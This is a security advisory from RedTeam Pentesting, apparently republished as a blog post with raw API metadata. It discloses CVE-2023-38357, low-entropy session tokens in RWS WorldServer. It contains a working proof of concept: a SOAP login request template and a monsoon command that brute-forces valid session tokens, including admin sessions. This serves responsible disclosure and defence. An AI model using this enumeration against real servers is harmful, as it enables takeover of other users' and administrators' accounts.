Advisory: Session Token Enumeration in RWS WorldServer<\/p>\n
Session tokens in RWS WorldServer have a low entropy and can be
\nenumerated, leading to unauthorised access to user sessions.<\/p>\n
Details
\n=======<\/p>\n
Product: WorldServer
\nAffected Versions: 11.7.3 and earlier versions
\nFixed Version: 11.8.0
\nVulnerability Type: Session Token Enumeration
\nSecurity Risk: high
\nVendor URL: https:\/\/www.rws.com\/localization\/products\/additional-solutions\/
\nVendor Status: fixed version released
\nAdvisory URL: https:\/\/www.redteam-pentesting.de\/advisories\/rt-sa-2023-001
\nAdvisory Status: published
\nCVE: CVE-2023-38357
\nCVE URL: https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2023-38357<\/p>\n
Introduction
\n============<\/p>\n
“WorldServer offers a flexible, enterprise-class translation management
\nsystem that automates translation tasks and greatly reduces the cost of
\nsupporting large volumes of local language content.”<\/p>\n
(from the vendor’s homepage)<\/p>\n
More Details
\n============<\/p>\n
WorldServer associates user sessions with numerical tokens, which always
\nare positive values below 2^31. The SOAP action “loginWithToken” allows
\nfor a high amount of parallel attempts to check if a token is valid.
\nDuring analysis, many assigned tokens were found to be in the 7-digit
\nrange of values. An attacker is therefore able to enumerate user
\naccounts in only a few hours.<\/p>\n
Proof of Concept
\n================<\/p>\n
In the following an example “loginWithToken” request is shown:<\/p>\n
———————————————————————–
\nPOST \/ws\/services\/WSContext HTTP\/1.1
\nContent-Type: text\/xml;charset=UTF-8
\nSOAPAction: “”
\nContent-Length: 501
\nHost: www.example.com
\nConnection: close
\nUser-Agent: agent<\/p>\n
<soapenv:Envelope xmlns:xsi=”http:\/\/www.w3.org\/2001\/XMLSchema-instance” xmlns:xsd=”http:\/\/www.w3.org\/2001\/XMLSchema”
\nxmlns:soapenv=”http:\/\/schemas.xmlsoap.org”>
\n<soapenv:Header\/>
\n<soapenv:Body>
\n<com:loginWithToken soapenv:encodingStyle=”http:\/\/schemas.xmlsoap.org\/soap\/encoding\/”>
\n<token xsi:type=”xsd:string”>FUZZ<\/token>
\n<\/com:loginWithToken>
\n<\/soapenv:Body>
\n<\/soapenv:Envelope>
\n———————————————————————–<\/p>\n
It can be saved as file “login-soap.req” and be used as a request
\ntemplate for the command-line HTTP enumerator monsoon [1] to achieve
\nmany parallel requests:<\/p>\n
———————————————————————–
\n$ monsoon fuzz –threads 100 \\
\n–template-file login-soap.req \\
\n–range 1-2147483647 \\
\n–hide-pattern “InvalidSessionException” \\
\n‘https:\/\/www.example.com’<\/p>\n
Target URL: https:\/\/www.example.com\/<\/p>\n
status header body value extract<\/p>\n
500 191 560 5829099
\n500 191 556 6229259
\n200 191 3702 7545136
\n500 191 556 9054984
\n[…]\nprocessed 12000000 HTTP requests in 2h38m38s
\n4 of 12000000 requests shown, 1225 req\/s
\n———————————————————————–<\/p>\n
The –range parameter reflects the possible value range of 2^31 and for
\neach value an HTTP request is sent to the WorldServer SOAP API where the
\nFUZZ marker in the request template is replaced with the respective
\nvalue. Also responses are hidden which contain “InvalidSessionException”
\nas these sessions are invalid. Responses will yield a status code of 200
\nif an administrative session token is found. For an unprivileged user
\nsession, status code 500 is returned.<\/p>\n
Workaround
\n==========<\/p>\n
Lower the rate at which requests can be issued, for example with a
\nfrontend proxy.<\/p>\n
Fix
\n===<\/p>\n
According to the vendor, upgrading to versions above 11.8.0 resolves the
\nvulnerability.<\/p>\n
Security Risk
\n=============<\/p>\n
Attackers can efficiently enumerate session tokens. In a penetration
\ntest, it was possible to get access to multiple user accounts, including
\nadministrative accounts using this method in under three hours.
\nAdditionally, by using such an administrative account it seems likely to
\nbe possible to execute arbitrary code on the underlying server by
\ncustomising the REST API [2]. Thus, the vulnerability poses a high risk.<\/p>\n
Timeline
\n========<\/p>\n
2023-03-27 Vulnerability identified
\n2023-03-30 Customer approved disclosure to vendor
\n2023-04-03 Requested security contact from vendor
\n2023-04-06 Vendor responded with security contact
\n2023-04-14 Advisory sent to vendor
\n2023-04-18 Vendor confirms vulnerability and states that it was already
\nknown and fixed in version 11.8.0.
\n2023-07-03 Customer confirms update to fixed version
\n2023-07-05 CVE ID requested
\n2023-07-15 CVE ID assigned
\n2023-07-19 Advisory released<\/p>\n
References
\n==========<\/p>\n[1] https:\/\/github.com\/RedTeamPentesting\/monsoon
\n[2] https:\/\/docs.rws.com\/860026\/585715\/worldserver-11-7-developer-documentation\/customizing-the-rest-api<\/p>\n
RedTeam Pentesting GmbH
\n=======================<\/p>\n
RedTeam Pentesting offers individual penetration tests performed by a
\nteam of specialised IT-security experts. Hereby, security weaknesses in
\ncompany networks or products are uncovered and can be fixed immediately.<\/p>\n
As there are only few experts in this field, RedTeam Pentesting wants to
\nshare its knowledge and enhance the public knowledge with research in
\nsecurity-related areas. The results are made available as public
\nsecurity advisories.<\/p>\n
More information about RedTeam Pentesting can be found at:
\nhttps:\/\/www.redteam-pentesting.de\/<\/p>\n
Working at RedTeam Pentesting
\n=============================<\/p>\n
RedTeam Pentesting is looking for penetration testers to join our team
\nin Aachen, Germany. If you are interested please visit:
\nhttps:\/\/jobs.redteam-pentesting.de\/<\/p>\n
—
\nRedTeam Pentesting GmbH Tel.: +49 241 510081-0
\nAlter Posthof 1 Fax : +49 241 510081-99
\n52062 Aachen https:\/\/www.redteam-pentesting.de
\nGermany Registergericht: Aachen HRB 14004
\nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen<\/p>\n","protected":false},"excerpt":{"rendered":"
Advisory: Session Token Enumeration in RWS WorldServer Session tokens in RWS WorldServer have a low entropy and can be enumerated, leading to unauthorised access to user sessions. Details ======= Product: WorldServer Affected Versions: 11.7.3 and earlier versions Fixed Version: 11.8.0 Vulnerability Type: Session Token Enumeration Security Risk: high Vendor URL: https:\/\/www.rws.com\/localization\/products\/additional-solutions\/ Vendor Status: fixed version …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-45320","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45320","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=45320"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45320\/revisions"}],"predecessor-version":[{"id":45548,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45320\/revisions\/45548"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=45320"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=45320"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=45320"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}